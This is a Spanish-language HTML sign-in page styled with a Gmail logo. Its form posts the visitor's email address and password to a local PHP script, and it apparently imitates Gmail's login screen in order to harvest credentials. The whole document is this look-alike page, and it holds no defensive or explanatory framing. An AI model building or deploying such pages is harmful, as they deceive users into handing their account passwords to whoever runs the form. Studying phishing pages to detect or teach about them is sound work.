<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Iniciar sesión</title>
    <style>
        body {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            background-color: #f2f2f2;
            margin: 0;
            padding: 0;
            display: flex;
            align-items: center;
            justify-content: center;
            height: 100vh;
        }

        .login-container {
            background-color: #fff;
            border-radius: 8px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            padding: 30px;
            width: 300px;
            text-align: center;
        }

        .login-container img {
            width: 100%;
            height: auto;
            max-width: 80px;
            margin-bottom: 20px;
        }

        .login-input {
            width: 100%;
            padding: 12px;
            margin-bottom: 15px;
            box-sizing: border-box;
            border: 1px solid #ccc;
            border-radius: 4px;
        }

        .login-button {
            width: 100%;
            padding: 12px;
            background-color: #007BFF; /* Cambiado a azul */
            color: #fff;
            border: none;
            border-radius: 4px;
            cursor: pointer;
        }

        .login-button:hover {
            background-color: #0056b3; /* Cambiado a un tono más oscuro de azul al pasar el ratón */
        }

        .login-footer {
            margin-top: 20px;
            font-size: 14px;
            color: #555;
        }
    </style>
</head>
<body>
    <div class="login-container">
        <img src="gmail_logo.png" alt="Gmail Logo">
        <form action="procesar_formulario.php" method="post">
            <input class="login-input" type="email" name="email" placeholder="Correo electrónico" required>
            <input class="login-input" type="password" name="password" placeholder="Contraseña" required>
            <button type="submit" class="login-button">Iniciar sesión</button>
        </form>
        <div class="login-footer">
            <p>¿No tienes una cuenta? <a href="#">Regístrate</a></p>
        </div>
    </div>
</body>
</html>
